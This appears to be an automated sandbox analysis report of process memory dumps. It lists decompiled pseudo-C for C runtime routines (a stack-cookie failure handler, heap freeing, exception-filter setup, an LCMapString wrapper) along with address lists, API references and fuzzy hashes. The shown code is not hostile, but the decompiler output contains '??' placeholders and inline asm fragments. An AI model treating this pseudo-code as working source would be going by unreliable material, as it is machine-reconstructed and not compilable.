                                                                                                              • Source File: 00000004.00000002.912471745.00000000026B2000.00000040.00000001.sdmp, Offset: 026B2000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c6c0f2fa6bad994613d7e1afcb27e24b25c65899bee9671599f241aacf87468d
                                                                                                              • Instruction ID: ebfdfc426e810f3a5c853fe9cbc308e98e923f433cf50d629964138f11c05b39
                                                                                                              • Opcode Fuzzy Hash: c6c0f2fa6bad994613d7e1afcb27e24b25c65899bee9671599f241aacf87468d
                                                                                                              • Instruction Fuzzy Hash: E3D05E342402814BC716DB0CC1A4F9977D4AF41B04F1644E9AC008B366C7B4D8C1C700
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Non-executed Functions

                                                                                                              C-Code - Quality: 85%
                                                                                                              			E0040CDC9(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                                                                                                              				intOrPtr _v0;
                                                                                                              				void* _v804;
                                                                                                              				intOrPtr _v808;
                                                                                                              				intOrPtr _v812;
                                                                                                              				intOrPtr _t6;
                                                                                                              				intOrPtr _t11;
                                                                                                              				intOrPtr _t12;
                                                                                                              				intOrPtr _t13;
                                                                                                              				long _t17;
                                                                                                              				intOrPtr _t21;
                                                                                                              				intOrPtr _t22;
                                                                                                              				intOrPtr _t25;
                                                                                                              				intOrPtr _t26;
                                                                                                              				intOrPtr _t27;
                                                                                                              				intOrPtr* _t31;
                                                                                                              				void* _t34;
                                                                                                              
                                                                                                              				_t27 = __esi;
                                                                                                              				_t26 = __edi;
                                                                                                              				_t25 = __edx;
                                                                                                              				_t22 = __ecx;
                                                                                                              				_t21 = __ebx;
                                                                                                              				_t6 = __eax;
                                                                                                              				_t34 = _t22 -  *0x422234; // 0xdc63c9ab
                                                                                                              				if(_t34 == 0) {
                                                                                                              					asm("repe ret");
                                                                                                              				}
                                                                                                              				 *0x423b98 = _t6;
                                                                                                              				 *0x423b94 = _t22;
                                                                                                              				 *0x423b90 = _t25;
                                                                                                              				 *0x423b8c = _t21;
                                                                                                              				 *0x423b88 = _t27;
                                                                                                              				 *0x423b84 = _t26;
                                                                                                              				 *0x423bb0 = ss;
                                                                                                              				 *0x423ba4 = cs;
                                                                                                              				 *0x423b80 = ds;
                                                                                                              				 *0x423b7c = es;
                                                                                                              				 *0x423b78 = fs;
                                                                                                              				 *0x423b74 = gs;
                                                                                                              				asm("pushfd");
                                                                                                              				_pop( *0x423ba8);
                                                                                                              				 *0x423b9c =  *_t31;
                                                                                                              				 *0x423ba0 = _v0;
                                                                                                              				 *0x423bac =  &_a4;
                                                                                                              				 *0x423ae8 = 0x10001;
                                                                                                              				_t11 =  *0x423ba0; // 0x0
                                                                                                              				 *0x423a9c = _t11;
                                                                                                              				 *0x423a90 = 0xc0000409;
                                                                                                              				 *0x423a94 = 1;
                                                                                                              				_t12 =  *0x422234; // 0xdc63c9ab
                                                                                                              				_v812 = _t12;
                                                                                                              				_t13 =  *0x422238; // 0x239c3654
                                                                                                              				_v808 = _t13;
                                                                                                              				 *0x423ae0 = IsDebuggerPresent();
                                                                                                              				_push(1);
                                                                                                              				E004138BC(_t14);
                                                                                                              				SetUnhandledExceptionFilter(0);
                                                                                                              				_t17 = UnhandledExceptionFilter(0x41fb80);
                                                                                                              				if( *0x423ae0 == 0) {
                                                                                                              					_push(1);
                                                                                                              					E004138BC(_t17);
                                                                                                              				}
                                                                                                              				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                                                              			}



















                                                                                                              0x0040cdc9
                                                                                                              0x0040cdc9
                                                                                                              0x0040cdc9
                                                                                                              0x0040cdc9
                                                                                                              0x0040cdc9
                                                                                                              0x0040cdc9
                                                                                                              0x0040cdc9
                                                                                                              0x0040cdcf
                                                                                                              0x0040cdd1
                                                                                                              0x0040cdd1
                                                                                                              0x00413604
                                                                                                              0x00413609
                                                                                                              0x0041360f
                                                                                                              0x00413615
                                                                                                              0x0041361b
                                                                                                              0x00413621
                                                                                                              0x00413627
                                                                                                              0x0041362e
                                                                                                              0x00413635
                                                                                                              0x0041363c
                                                                                                              0x00413643
                                                                                                              0x0041364a
                                                                                                              0x00413651
                                                                                                              0x00413652
                                                                                                              0x0041365b
                                                                                                              0x00413663
                                                                                                              0x0041366b
                                                                                                              0x00413676
                                                                                                              0x00413680
                                                                                                              0x00413685
                                                                                                              0x0041368a
                                                                                                              0x00413694
                                                                                                              0x0041369e
                                                                                                              0x004136a3
                                                                                                              0x004136a9
                                                                                                              0x004136ae
                                                                                                              0x004136ba
                                                                                                              0x004136bf
                                                                                                              0x004136c1
                                                                                                              0x004136c9
                                                                                                              0x004136d4
                                                                                                              0x004136e1
                                                                                                              0x004136e3
                                                                                                              0x004136e5
                                                                                                              0x004136ea
                                                                                                              0x004136fe

                                                                                                              APIs
                                                                                                              • IsDebuggerPresent.KERNEL32 ref: 004136B4
                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004136C9
                                                                                                              • UnhandledExceptionFilter.KERNEL32(0041FB80), ref: 004136D4
                                                                                                              • GetCurrentProcess.KERNEL32(C0000409), ref: 004136F0
                                                                                                              • TerminateProcess.KERNEL32(00000000), ref: 004136F7
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.911697008.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.911727134.0000000000448000.00000040.00000001.sdmp Download File
                                                                                                              Similarity
                                                                                                              • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                              • String ID:
                                                                                                              • API String ID: 2579439406-0
                                                                                                              • Opcode ID: f3eb938b166f39d4d020ee18d2dca188d57905d26237a3e6fbc30aeabaf4294c
                                                                                                              • Instruction ID: 3f88b7fe57f3af7d6669973961cc77578a05b077b22a335d8346f22795b37958
                                                                                                              • Opcode Fuzzy Hash: f3eb938b166f39d4d020ee18d2dca188d57905d26237a3e6fbc30aeabaf4294c
                                                                                                              • Instruction Fuzzy Hash: A321F574601204EFD720DF65E9496457FB4FB08316F80407AE50887362E778A682CF4D
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              C-Code - Quality: 100%
                                                                                                              			E0040AD70(intOrPtr* __ecx) {
                                                                                                              				void* _t5;
                                                                                                              				intOrPtr* _t11;
                                                                                                              
                                                                                                              				_t11 = __ecx;
                                                                                                              				_t5 =  *(__ecx + 8);
                                                                                                              				 *__ecx = 0x41eff0;
                                                                                                              				if(_t5 != 0) {
                                                                                                              					_t5 =  *((intOrPtr*)( *((intOrPtr*)( *_t5 + 8))))(_t5);
                                                                                                              				}
                                                                                                              				if( *(_t11 + 0xc) != 0) {
                                                                                                              					_t5 = GetProcessHeap();
                                                                                                              					if(_t5 != 0) {
                                                                                                              						return HeapFree(_t5, 0,  *(_t11 + 0xc));
                                                                                                              					}
                                                                                                              				}
                                                                                                              				return _t5;
                                                                                                              			}





                                                                                                              0x0040ad73
                                                                                                              0x0040ad75
                                                                                                              0x0040ad78
                                                                                                              0x0040ad80
                                                                                                              0x0040ad88
                                                                                                              0x0040ad88
                                                                                                              0x0040ad8e
                                                                                                              0x0040ad90
                                                                                                              0x0040ad98
                                                                                                              0x00000000
                                                                                                              0x0040ada1
                                                                                                              0x0040ad98
                                                                                                              0x0040ada8

                                                                                                              APIs
                                                                                                              • GetProcessHeap.KERNEL32 ref: 0040AD90
                                                                                                              • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040ADA1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.911697008.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.911727134.0000000000448000.00000040.00000001.sdmp Download File
                                                                                                              Similarity
                                                                                                              • API ID: Heap$FreeProcess
                                                                                                              • String ID:
                                                                                                              • API String ID: 3859560861-0
                                                                                                              • Opcode ID: 1cc3613efa1b408a07d3bda581eddd458e6bd1778ad13645e2e7b7f8138afa03
                                                                                                              • Instruction ID: 87dac2184505844c09cb42e2b5ef4fe4ca92d2df11bc344c415d2bc0d320b6aa
                                                                                                              • Opcode Fuzzy Hash: 1cc3613efa1b408a07d3bda581eddd458e6bd1778ad13645e2e7b7f8138afa03
                                                                                                              • Instruction Fuzzy Hash: 7FE09A312003009FC3209B21DC08F9337AAEF88311F15C42AE95AD36A0CB78EC82CB59
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              C-Code - Quality: 100%
                                                                                                              			E004123B1() {
                                                                                                              
                                                                                                              				SetUnhandledExceptionFilter(E0041236F);
                                                                                                              				return 0;
                                                                                                              			}



                                                                                                              0x004123b6
                                                                                                              0x004123be

                                                                                                              APIs
                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(Function_0001236F), ref: 004123B6
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.911697008.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.911727134.0000000000448000.00000040.00000001.sdmp Download File
                                                                                                              Similarity
                                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                                              • String ID:
                                                                                                              • API String ID: 3192549508-0
                                                                                                              • Opcode ID: c5bec46203bb928b6661f320d0224aa42f58454027b2ed7ef2d3bc0e147829a7
                                                                                                              • Instruction ID: a9d574e59b617bab4533f0d30aa636e653cc17d396c8e80ebbe0ff8c2e40eb30
                                                                                                              • Opcode Fuzzy Hash: c5bec46203bb928b6661f320d0224aa42f58454027b2ed7ef2d3bc0e147829a7
                                                                                                              • Instruction Fuzzy Hash: 6590027065114C8B464057705D0D68729D8BA4C6067D148616436C4058EB9842509559
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              C-Code - Quality: 86%
                                                                                                              			E00417041(short* __ecx, int _a4, signed int _a8, char* _a12, int _a16, char* _a20, int _a24, int _a28, intOrPtr _a32) {
                                                                                                              				signed int _v8;
                                                                                                              				int _v12;
                                                                                                              				int _v16;
                                                                                                              				int _v20;
                                                                                                              				intOrPtr _v24;
                                                                                                              				void* _v36;
                                                                                                              				void* __ebx;
                                                                                                              				void* __edi;
                                                                                                              				void* __esi;
                                                                                                              				void* __ebp;
                                                                                                              				signed int _t110;
                                                                                                              				intOrPtr _t112;
                                                                                                              				intOrPtr _t113;
                                                                                                              				short* _t115;
                                                                                                              				short* _t116;
                                                                                                              				char* _t120;
                                                                                                              				short* _t121;
                                                                                                              				short* _t123;
                                                                                                              				short* _t127;
                                                                                                              				int _t128;
                                                                                                              				short* _t141;
                                                                                                              				signed int _t144;
                                                                                                              				void* _t146;
                                                                                                              				short* _t147;
                                                                                                              				signed int _t150;
                                                                                                              				short* _t153;
                                                                                                              				char* _t157;
                                                                                                              				int _t160;
                                                                                                              				long _t162;
                                                                                                              				signed int _t174;
                                                                                                              				signed int _t178;
                                                                                                              				signed int _t179;
                                                                                                              				int _t182;
                                                                                                              				short* _t184;
                                                                                                              				signed int _t186;
                                                                                                              				signed int _t188;
                                                                                                              				short* _t189;
                                                                                                              				int _t191;
                                                                                                              				intOrPtr _t194;
                                                                                                              				int _t207;
                                                                                                              
                                                                                                              				_t110 =  *0x422234; // 0xdc63c9ab
                                                                                                              				_v8 = _t110 ^ _t188;
                                                                                                              				_t184 = __ecx;
                                                                                                              				_t194 =  *0x423e7c; // 0x1
                                                                                                              				if(_t194 == 0) {
                                                                                                              					_t182 = 1;
                                                                                                              					if(LCMapStringW(0, 0x100, 0x420398, 1, 0, 0) == 0) {
                                                                                                              						_t162 = GetLastError();
                                                                                                              						__eflags = _t162 - 0x78;
                                                                                                              						if(_t162 == 0x78) {
                                                                                                              							 *0x423e7c = 2;
                                                                                                              						}
                                                                                                              					} else {
                                                                                                              						 *0x423e7c = 1;
                                                                                                              					}
                                                                                                              				}
                                                                                                              				if(_a16 <= 0) {
                                                                                                              					L13:
                                                                                                              					_t112 =  *0x423e7c; // 0x1
                                                                                                              					if(_t112 == 2 || _t112 == 0) {
                                                                                                              						_v16 = 0;
                                                                                                              						_v20 = 0;
                                                                                                              						__eflags = _a4;
                                                                                                              						if(_a4 == 0) {
                                                                                                              							_a4 =  *((intOrPtr*)( *_t184 + 0x14));
                                                                                                              						}
                                                                                                              						__eflags = _a28;
                                                                                                              						if(_a28 == 0) {
                                                                                                              							_a28 =  *((intOrPtr*)( *_t184 + 4));
                                                                                                              						}
                                                                                                              						_t113 = E004179E0(0, _t179, _t182, _t184, _a4);
                                                                                                              						_v24 = _t113;
                                                                                                              						__eflags = _t113 - 0xffffffff;
                                                                                                              						if(_t113 != 0xffffffff) {
                                                                                                              							__eflags = _t113 - _a28;
                                                                                                              							if(_t113 == _a28) {
                                                                                                              								_t184 = LCMapStringA(_a4, _a8, _a12, _a16, _a20, _a24);
                                                                                                              								L78:
                                                                                                              								__eflags = _v16;
                                                                                                              								if(__eflags != 0) {
                                                                                                              									_push(_v16);
                                                                                                              									E0040B675(0, _t182, _t184, __eflags);
                                                                                                              								}
                                                                                                              								_t115 = _v20;
                                                                                                              								__eflags = _t115;
                                                                                                              								if(_t115 != 0) {
                                                                                                              									__eflags = _a20 - _t115;
                                                                                                              									if(__eflags != 0) {
                                                                                                              										_push(_t115);
                                                                                                              										E0040B675(0, _t182, _t184, __eflags);
                                                                                                              									}
                                                                                                              								}
                                                                                                              								_t116 = _t184;
                                                                                                              								goto L84;
                                                                                                              							}
                                                                                                              							_t120 = E00417A29(_t179, _a28, _t113, _a12,  &_a16, 0, 0);
                                                                                                              							_t191 =  &(_t189[0xc]);
                                                                                                              							_v16 = _t120;
                                                                                                              							__eflags = _t120;
                                                                                                              							if(_t120 == 0) {
                                                                                                              								goto L58;
                                                                                                              							}
                                                                                                              							_t121 = LCMapStringA(_a4, _a8, _t120, _a16, 0, 0);
                                                                                                              							_v12 = _t121;
                                                                                                              							__eflags = _t121;
                                                                                                              							if(__eflags != 0) {
                                                                                                              								if(__eflags <= 0) {
                                                                                                              									L71:
                                                                                                              									_t182 = 0;
                                                                                                              									__eflags = 0;
                                                                                                              									L72:
                                                                                                              									__eflags = _t182;
                                                                                                              									if(_t182 == 0) {
                                                                                                              										goto L62;
                                                                                                              									}
                                                                                                              									E0040B9F0(_t182, _t182, 0, _v12);
                                                                                                              									_t123 = LCMapStringA(_a4, _a8, _v16, _a16, _t182, _v12);
                                                                                                              									_v12 = _t123;
                                                                                                              									__eflags = _t123;
                                                                                                              									if(_t123 != 0) {
                                                                                                              										_t186 = E00417A29(_t179, _v24, _a28, _t182,  &_v12, _a20, _a24);
                                                                                                              										_v20 = _t186;
                                                                                                              										asm("sbb esi, esi");
                                                                                                              										_t184 =  ~_t186 & _v12;
                                                                                                              										__eflags = _t184;
                                                                                                              									} else {
                                                                                                              										_t184 = 0;
                                                                                                              									}
                                                                                                              									E0041476E(_t182);
                                                                                                              									goto L78;
                                                                                                              								}
                                                                                                              								__eflags = _t121 - 0xffffffe0;
                                                                                                              								if(_t121 > 0xffffffe0) {
                                                                                                              									goto L71;
                                                                                                              								}
                                                                                                              								_t127 =  &(_t121[4]);
                                                                                                              								__eflags = _t127 - 0x400;
                                                                                                              								if(_t127 > 0x400) {
                                                                                                              									_t128 = E0040B80D(0, _t179, _t182, _t127);
                                                                                                              									__eflags = _t128;
                                                                                                              									if(_t128 != 0) {
                                                                                                              										 *_t128 = 0xdddd;
                                                                                                              										_t128 = _t128 + 8;
                                                                                                              										__eflags = _t128;
                                                                                                              									}
                                                                                                              									_t182 = _t128;
                                                                                                              									goto L72;
                                                                                                              								}
                                                                                                              								E0040CF70(_t127);
                                                                                                              								_t182 = _t191;
                                                                                                              								__eflags = _t182;
                                                                                                              								if(_t182 == 0) {
                                                                                                              									goto L62;
                                                                                                              								}
                                                                                                              								 *_t182 = 0xcccc;
                                                                                                              								_t182 = _t182 + 8;
                                                                                                              								goto L72;
                                                                                                              							}
                                                                                                              							L62:
                                                                                                              							_t184 = 0;
                                                                                                              							goto L78;
                                                                                                              						} else {
                                                                                                              							goto L58;
                                                                                                              						}
                                                                                                              					} else {
                                                                                                              						if(_t112 != 1) {
                                                                                                              							L58:
                                                                                                              							_t116 = 0;
                                                                                                              							L84:
                                                                                                              							return E0040CDC9(_t116, 0, _v8 ^ _t188, _t179, _t182, _t184);
                                                                                                              						}
                                                                                                              						_v12 = 0;
                                                                                                              						if(_a28 == 0) {
                                                                                                              							_a28 =  *((intOrPtr*)( *_t184 + 4));
                                                                                                              						}
                                                                                                              						_t184 = MultiByteToWideChar;
                                                                                                              						_t182 = MultiByteToWideChar(_a28, 1 + (0 | _a32 != 0x00000000) * 8, _a12, _a16, 0, 0);
                                                                                                              						_t207 = _t182;
                                                                                                              						if(_t207 == 0) {
                                                                                                              							goto L58;
                                                                                                              						} else {
                                                                                                              							if(_t207 <= 0) {
                                                                                                              								L28:
                                                                                                              								_v16 = 0;
                                                                                                              								L29:
                                                                                                              								if(_v16 == 0) {
                                                                                                              									goto L58;
                                                                                                              								}
                                                                                                              								if(MultiByteToWideChar(_a28, 1, _a12, _a16, _v16, _t182) == 0) {
                                                                                                              									L52:
                                                                                                              									E0041476E(_v16);
                                                                                                              									_t116 = _v12;
                                                                                                              									goto L84;
                                                                                                              								}
                                                                                                              								_t184 = LCMapStringW;
                                                                                                              								_t174 = LCMapStringW(_a4, _a8, _v16, _t182, 0, 0);
                                                                                                              								_v12 = _t174;
                                                                                                              								if(_t174 == 0) {
                                                                                                              									goto L52;
                                                                                                              								}
                                                                                                              								if((_a8 & 0x00000400) == 0) {
                                                                                                              									__eflags = _t174;
                                                                                                              									if(_t174 <= 0) {
                                                                                                              										L44:
                                                                                                              										_t184 = 0;
                                                                                                              										__eflags = 0;
                                                                                                              										L45:
                                                                                                              										__eflags = _t184;
                                                                                                              										if(_t184 != 0) {
                                                                                                              											_t141 = LCMapStringW(_a4, _a8, _v16, _t182, _t184, _v12);
                                                                                                              											__eflags = _t141;
                                                                                                              											if(_t141 != 0) {
                                                                                                              												_push(0);
                                                                                                              												_push(0);
                                                                                                              												__eflags = _a24;
                                                                                                              												if(_a24 != 0) {
                                                                                                              													_push(_a24);
                                                                                                              													_push(_a20);
                                                                                                              												} else {
                                                                                                              													_push(0);
                                                                                                              													_push(0);
                                                                                                              												}
                                                                                                              												_v12 = WideCharToMultiByte(_a28, 0, _t184, _v12, ??, ??, ??, ??);
                                                                                                              											}
                                                                                                              											E0041476E(_t184);
                                                                                                              										}
                                                                                                              										goto L52;
                                                                                                              									}
                                                                                                              									_t144 = 0xffffffe0;
                                                                                                              									_t179 = _t144 % _t174;
                                                                                                              									__eflags = _t144 / _t174 - 2;
                                                                                                              									if(_t144 / _t174 < 2) {
                                                                                                              										goto L44;
                                                                                                              									}
                                                                                                              									_t52 = _t174 + 8; // 0x8
                                                                                                              									_t146 = _t174 + _t52;
                                                                                                              									__eflags = _t146 - 0x400;
                                                                                                              									if(_t146 > 0x400) {
                                                                                                              										_t147 = E0040B80D(0, _t179, _t182, _t146);
                                                                                                              										__eflags = _t147;
                                                                                                              										if(_t147 != 0) {
                                                                                                              											 *_t147 = 0xdddd;
                                                                                                              											_t147 =  &(_t147[4]);
                                                                                                              											__eflags = _t147;
                                                                                                              										}
                                                                                                              										_t184 = _t147;
                                                                                                              										goto L45;
                                                                                                              									}
                                                                                                              									E0040CF70(_t146);
                                                                                                              									_t184 = _t189;
                                                                                                              									__eflags = _t184;
                                                                                                              									if(_t184 == 0) {
                                                                                                              										goto L52;
                                                                                                              									}
                                                                                                              									 *_t184 = 0xcccc;
                                                                                                              									_t184 =  &(_t184[4]);
                                                                                                              									goto L45;
                                                                                                              								}
                                                                                                              								if(_a24 != 0 && _t174 <= _a24) {
                                                                                                              									LCMapStringW(_a4, _a8, _v16, _t182, _a20, _a24);
                                                                                                              								}
                                                                                                              								goto L52;
                                                                                                              							}
                                                                                                              							_t150 = 0xffffffe0;
                                                                                                              							_t179 = _t150 % _t182;
                                                                                                              							if(_t150 / _t182 < 2) {
                                                                                                              								goto L28;
                                                                                                              							}
                                                                                                              							_t25 = _t182 + 8; // 0x8
                                                                                                              							_t152 = _t182 + _t25;
                                                                                                              							if(_t182 + _t25 > 0x400) {
                                                                                                              								_t153 = E0040B80D(0, _t179, _t182, _t152);
                                                                                                              								__eflags = _t153;
                                                                                                              								if(_t153 == 0) {
                                                                                                              									L27:
                                                                                                              									_v16 = _t153;
                                                                                                              									goto L29;
                                                                                                              								}
                                                                                                              								 *_t153 = 0xdddd;
                                                                                                              								L26:
                                                                                                              								_t153 =  &(_t153[4]);
                                                                                                              								goto L27;
                                                                                                              							}
                                                                                                              							E0040CF70(_t152);
                                                                                                              							_t153 = _t189;
                                                                                                              							if(_t153 == 0) {
                                                                                                              								goto L27;
                                                                                                              							}
                                                                                                              							 *_t153 = 0xcccc;
                                                                                                              							goto L26;
                                                                                                              						}
                                                                                                              					}
                                                                                                              				}
                                                                                                              				_t178 = _a16;
                                                                                                              				_t157 = _a12;
                                                                                                              				while(1) {
                                                                                                              					_t178 = _t178 - 1;
                                                                                                              					if( *_t157 == 0) {
                                                                                                              						break;
                                                                                                              					}
                                                                                                              					_t157 =  &(_t157[1]);
                                                                                                              					if(_t178 != 0) {
                                                                                                              						continue;
                                                                                                              					}
                                                                                                              					_t178 = _t178 | 0xffffffff;
                                                                                                              					break;
                                                                                                              				}
                                                                                                              				_t160 = _a16 - _t178 - 1;
                                                                                                              				if(_t160 < _a16) {
                                                                                                              					_t160 = _t160 + 1;
                                                                                                              				}
                                                                                                              				_a16 = _t160;
                                                                                                              				goto L13;
                                                                                                              			}











































                                                                                                              0x00417049
                                                                                                              0x00417050
                                                                                                              0x00417058
                                                                                                              0x0041705a
                                                                                                              0x00417060
                                                                                                              0x00417066
                                                                                                              0x0041707b
                                                                                                              0x00417085
                                                                                                              0x0041708b
                                                                                                              0x0041708e
                                                                                                              0x00417090
                                                                                                              0x00417090
                                                                                                              0x0041707d
                                                                                                              0x0041707d
                                                                                                              0x0041707d
                                                                                                              0x0041707b
                                                                                                              0x0041709d
                                                                                                              0x004170c1
                                                                                                              0x004170c1
                                                                                                              0x004170c9
                                                                                                              0x0041727b
                                                                                                              0x0041727e
                                                                                                              0x00417281
                                                                                                              0x00417284
                                                                                                              0x0041728b
                                                                                                              0x0041728b
                                                                                                              0x0041728e
                                                                                                              0x00417291
                                                                                                              0x00417298
                                                                                                              0x00417298
                                                                                                              0x0041729e
                                                                                                              0x004172a4
                                                                                                              0x004172a7
                                                                                                              0x004172aa
                                                                                                              0x004172b3
                                                                                                              0x004172b6
                                                                                                              0x004173af
                                                                                                              0x004173b1
                                                                                                              0x004173b1
                                                                                                              0x004173b4
                                                                                                              0x004173b6
                                                                                                              0x004173b9
                                                                                                              0x004173be
                                                                                                              0x004173bf
                                                                                                              0x004173c2
                                                                                                              0x004173c4
                                                                                                              0x004173c6
                                                                                                              0x004173c9
                                                                                                              0x004173cb
                                                                                                              0x004173cc
                                                                                                              0x004173d1
                                                                                                              0x004173c9
                                                                                                              0x004173d2
                                                                                                              0x00000000
                                                                                                              0x004173d2
                                                                                                              0x004172c9
                                                                                                              0x004172ce
                                                                                                              0x004172d1
                                                                                                              0x004172d4
                                                                                                              0x004172d6
                                                                                                              0x00000000
                                                                                                              0x00000000
                                                                                                              0x004172ea
                                                                                                              0x004172ec
                                                                                                              0x004172ef
                                                                                                              0x004172f1
                                                                                                              0x004172fa
                                                                                                              0x00417339
                                                                                                              0x00417339
                                                                                                              0x00417339
                                                                                                              0x0041733b
                                                                                                              0x0041733b
                                                                                                              0x0041733d
                                                                                                              0x00000000
                                                                                                              0x00000000
                                                                                                              0x00417344
                                                                                                              0x0041735c
                                                                                                              0x0041735e
                                                                                                              0x00417361
                                                                                                              0x00417363
                                                                                                              0x0041737f
                                                                                                              0x00417381
                                                                                                              0x00417389
                                                                                                              0x0041738b
                                                                                                              0x0041738b
                                                                                                              0x00417365
                                                                                                              0x00417365
                                                                                                              0x00417365
                                                                                                              0x0041738f
                                                                                                              0x00000000
                                                                                                              0x00417394
                                                                                                              0x004172fc
                                                                                                              0x004172ff
                                                                                                              0x00000000
                                                                                                              0x00000000
                                                                                                              0x00417301
                                                                                                              0x00417304
                                                                                                              0x00417309
                                                                                                              0x00417322
                                                                                                              0x00417328
                                                                                                              0x0041732a
                                                                                                              0x0041732c
                                                                                                              0x00417332
                                                                                                              0x00417332
                                                                                                              0x00417332
                                                                                                              0x00417335
                                                                                                              0x00000000
                                                                                                              0x00417335
                                                                                                              0x0041730b
                                                                                                              0x00417310
                                                                                                              0x00417312
                                                                                                              0x00417314
                                                                                                              0x00000000
                                                                                                              0x00000000
                                                                                                              0x00417316
                                                                                                              0x0041731c
                                                                                                              0x00000000
                                                                                                              0x0041731c
                                                                                                              0x004172f3
                                                                                                              0x004172f3
                                                                                                              0x00000000
                                                                                                              0x00000000
                                                                                                              0x00000000
                                                                                                              0x00000000
                                                                                                              0x004170d7
                                                                                                              0x004170da
                                                                                                              0x004172ac
                                                                                                              0x004172ac
                                                                                                              0x004173d4
                                                                                                              0x004173e5
                                                                                                              0x004173e5
                                                                                                              0x004170e0
                                                                                                              0x004170e6
                                                                                                              0x004170ed
                                                                                                              0x004170ed
                                                                                                              0x004170f0
                                                                                                              0x00417113
                                                                                                              0x00417115
                                                                                                              0x00417117
                                                                                                              0x00000000
                                                                                                              0x0041711d
                                                                                                              0x0041711d
                                                                                                              0x00417162
                                                                                                              0x00417162
                                                                                                              0x00417165
                                                                                                              0x00417168
                                                                                                              0x00000000
                                                                                                              0x00000000
                                                                                                              0x00417181
                                                                                                              0x0041726a
                                                                                                              0x0041726d
                                                                                                              0x00417272
                                                                                                              0x00000000
                                                                                                              0x00417275
                                                                                                              0x00417187
                                                                                                              0x0041719b
                                                                                                              0x0041719d
                                                                                                              0x004171a2
                                                                                                              0x00000000
                                                                                                              0x00000000
                                                                                                              0x004171af
                                                                                                              0x004171da
                                                                                                              0x004171dc
                                                                                                              0x00417223
                                                                                                              0x00417223
                                                                                                              0x00417223
                                                                                                              0x00417225
                                                                                                              0x00417225
                                                                                                              0x00417227
                                                                                                              0x00417237
                                                                                                              0x0041723d
                                                                                                              0x0041723f
                                                                                                              0x00417241
                                                                                                              0x00417242
                                                                                                              0x00417243
                                                                                                              0x00417246
                                                                                                              0x0041724c
                                                                                                              0x0041724f
                                                                                                              0x00417248
                                                                                                              0x00417248
                                                                                                              0x00417249
                                                                                                              0x00417249
                                                                                                              0x00417260
                                                                                                              0x00417260
                                                                                                              0x00417264
                                                                                                              0x00417269
                                                                                                              0x00000000
                                                                                                              0x00417227
                                                                                                              0x004171e2
                                                                                                              0x004171e3
                                                                                                              0x004171e5
                                                                                                              0x004171e8
                                                                                                              0x00000000
                                                                                                              0x00000000
                                                                                                              0x004171ea
                                                                                                              0x004171ea
                                                                                                              0x004171ee
                                                                                                              0x004171f3
                                                                                                              0x0041720c
                                                                                                              0x00417212
                                                                                                              0x00417214
                                                                                                              0x00417216
                                                                                                              0x0041721c
                                                                                                              0x0041721c
                                                                                                              0x0041721c
                                                                                                              0x0041721f
                                                                                                              0x00000000
                                                                                                              0x0041721f
                                                                                                              0x004171f5
                                                                                                              0x004171fa
                                                                                                              0x004171fc
                                                                                                              0x004171fe
                                                                                                              0x00000000
                                                                                                              0x00000000
                                                                                                              0x00417200
                                                                                                              0x00417206
                                                                                                              0x00000000
                                                                                                              0x00417206
                                                                                                              0x004171b4
                                                                                                              0x004171d3
                                                                                                              0x004171d3
                                                                                                              0x00000000
                                                                                                              0x004171b4
                                                                                                              0x00417123
                                                                                                              0x00417124
                                                                                                              0x00417129
                                                                                                              0x00000000
                                                                                                              0x00000000
                                                                                                              0x0041712b
                                                                                                              0x0041712b
                                                                                                              0x00417134
                                                                                                              0x0041714a
                                                                                                              0x00417150
                                                                                                              0x00417152
                                                                                                              0x0041715d
                                                                                                              0x0041715d
                                                                                                              0x00000000
                                                                                                              0x0041715d
                                                                                                              0x00417154
                                                                                                              0x0041715a
                                                                                                              0x0041715a
                                                                                                              0x00000000
                                                                                                              0x0041715a
                                                                                                              0x00417136
                                                                                                              0x0041713b
                                                                                                              0x0041713f
                                                                                                              0x00000000
                                                                                                              0x00000000
                                                                                                              0x00417141
                                                                                                              0x00000000
                                                                                                              0x00417141
                                                                                                              0x00417117
                                                                                                              0x004170c9
                                                                                                              0x0041709f
                                                                                                              0x004170a2
                                                                                                              0x004170a5
                                                                                                              0x004170a5
                                                                                                              0x004170a8
                                                                                                              0x00000000
                                                                                                              0x00000000
                                                                                                              0x004170aa
                                                                                                              0x004170ad
                                                                                                              0x00000000
                                                                                                              0x00000000
                                                                                                              0x004170af
                                                                                                              0x00000000
                                                                                                              0x004170af
                                                                                                              0x004170b7
                                                                                                              0x004170bb
                                                                                                              0x004170bd
                                                                                                              0x004170bd
                                                                                                              0x004170be
                                                                                                              0x00000000

                                                                                                              APIs
                                                                                                              • LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 00417073
                                                                                                              • GetLastError.KERNEL32(?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000,?,7FFFFFFF,00000000,00000000,?,02901860), ref: 00417085
